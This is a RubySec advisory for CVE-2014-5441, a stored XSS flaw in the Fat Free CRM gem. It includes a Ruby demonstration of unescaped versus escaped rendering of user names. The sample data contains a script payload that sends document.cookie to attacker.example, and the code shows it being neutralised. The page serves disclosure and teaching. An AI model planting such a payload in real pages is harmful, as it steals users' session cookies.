RubySec

Providing security resources for the Ruby community

CVE-2014-5441 (fat_free_crm): Fat Free CRM Gem contains a javascript cross-site scripting (XSS) vulnerability

GEM

fat_free_crm

SEVERITY

CVSS v2.0: 4.3 (Medium)

UNAFFECTED VERSIONS

  • <= 0.11.0

PATCHED VERSIONS

  • >= 0.13.3

DESCRIPTION

The Fat Free CRM gem contains a stored JavaScript cross-site scripting (XSS) vulnerability. When a user is created or updated with a specifically crafted username, first name or last name, the crafted value is saved with the user record and later rendered unescaped, so arbitrary JavaScript can be executed on all Fat Free CRM pages. The injected code runs in the browser of every logged-in user who views a page that displays the affected field.
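The following is an added illustration of the bug class described above, written for this page and not taken from the Fat Free CRM code base. It assumes a view helper that builds a user's display name by interpolating the stored fields straight into HTML (the same effect as calling `raw` or `html_safe` on them in a Rails template), and contrasts it with the same helper escaping every user-controlled value at the point of output. The user records are constructed sample data; the third one carries a crafted first name of the kind the advisory describes.

```ruby
require "erb"

# Constructed sample user records (not real data). "mallory" was created with a
# crafted first name, which is exactly the attack surface the advisory names.
USERS = [
  { username: "alice",   first_name: "Alice", last_name: "Adams" },
  { username: "bob",     first_name: "Bob",   last_name: "O'Brien" },
  { username: "mallory",
    first_name: "<script>new Image().src='https://attacker.example/?c='+document.cookie</script>",
    last_name:  "Evil" },
]

def full_name(user)
  "#{user[:first_name]} #{user[:last_name]}"
end

# Vulnerable pattern (hypothetical helper): user-controlled strings are
# concatenated into markup with no escaping. Because the payload lives in the
# user record, every page that shows this header replays it for every viewer.
def render_user_unsafe(user)
  %(<span class="user">#{full_name(user)} (#{user[:username]})</span>)
end

# Hardened pattern: escape each user-controlled value where it is emitted.
# ERB::Util.html_escape maps & < > " ' to entities, so a stored "<script>"
# arrives in the browser as literal text rather than an element.
def render_user_safe(user)
  h = ERB::Util.method(:html_escape)
  %(<span class="user">#{h.call(full_name(user))} (#{h.call(user[:username])})</span>)
end

# A page that lists all users (assignee dropdowns, activity feeds, headers)
# renders the stored payload once per affected record.
def render_user_list(users, escape:)
  rows = users.map { |u| escape ? render_user_safe(u) : render_user_unsafe(u) }
  "<ul>\n" + rows.map { |r| "  <li>#{r}</li>" }.join("\n") + "\n</ul>"
end

# Detection check: does the rendered markup still contain an executable
# script element that originated in user data?
def contains_script_tag?(html)
  html.match?(%r{<script\b}i)
end

if __FILE__ == $PROGRAM_NAME
  puts "unsafe list contains <script>: #{contains_script_tag?(render_user_list(USERS, escape: false))}"
  puts "safe list contains <script>:   #{contains_script_tag?(render_user_list(USERS, escape: true))}"
  puts render_user_list(USERS, escape: true)
end
```

Output escaping is the fix; rejecting angle brackets in names at input time is at best defense in depth, since the same fields may be emitted in JSON, e-mail or JavaScript contexts where HTML entities are the wrong encoding. Note that the escaped version also rewrites the apostrophe in "O'Brien" to `&#39;`, which is harmless in HTML but worth knowing when comparing rendered output in tests.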